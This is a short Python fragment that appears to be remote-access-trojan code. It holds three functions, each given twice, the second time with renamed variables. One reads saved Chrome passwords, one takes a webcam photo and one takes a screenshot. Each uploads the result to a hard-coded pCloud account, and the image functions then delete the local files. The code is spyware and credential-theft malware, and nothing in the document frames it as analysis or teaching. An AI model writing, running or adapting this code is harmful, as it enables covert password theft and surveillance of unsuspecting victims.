def T(): pass_list = passretlib.retreive.chrome() t = time.gmtime() name = "UNPW " + d(t.tm_hour) + "." + d(t.tm_min) + "." + d( t.tm_sec) + " " + d(t.tm_mday) + "-" + d(t.tm_mon) + "-" + d( t.tm_year) name = name + ".txt" obj = pcloud.PyCloud("*****@*****.**", "ratsaregood") obj.uploadfile(filename="/unpw/" + name, data=("\n\n".join(pass_list)))
def E(): name = "" name = webcamlib.takepic() obj = pcloud.PyCloud("*****@*****.**", "ratsaregood") image_file = r(name, "rb") sc_image = image_file.read() image_file.close() obj.uploadfile(filename="/sswb/" + name, data=sc_image) os.remove(name)
def K(): name = '' name = scrshotlib.tss(name) obj = pcloud.PyCloud("*****@*****.**", "ratsaregood") image_file = r(name, "rb") sc_image = image_file.read() image_file.close() obj.uploadfile(filename="/sswb/" + name, data=sc_image) os.remove(name)
def T(): F = passretlib.retreive.chrome() t = time.gmtime() a = "UNPW " + d(t.tm_hour) + "." + d(t.tm_min) + "." + d( t.tm_sec) + " " + d(t.tm_mday) + "-" + d(t.tm_mon) + "-" + d( t.tm_year) a = a + ".txt" t = pcloud.PyCloud("*****@*****.**", "ratsaregood") t.uploadfile(filename="/unpw/" + a, data=("\n\n".join(F)))
def E(): a = "" a = webcamlib.takepic() t = pcloud.PyCloud("*****@*****.**", "ratsaregood") L = r(a, "rb") B = L.read() L.close() t.uploadfile(filename="/sswb/" + a, data=B) os.remove(a)
def K(): a = '' a = scrshotlib.tss(a) t = pcloud.PyCloud("*****@*****.**", "ratsaregood") L = r(a, "rb") B = L.read() L.close() t.uploadfile(filename="/sswb/" + a, data=B) os.remove(a)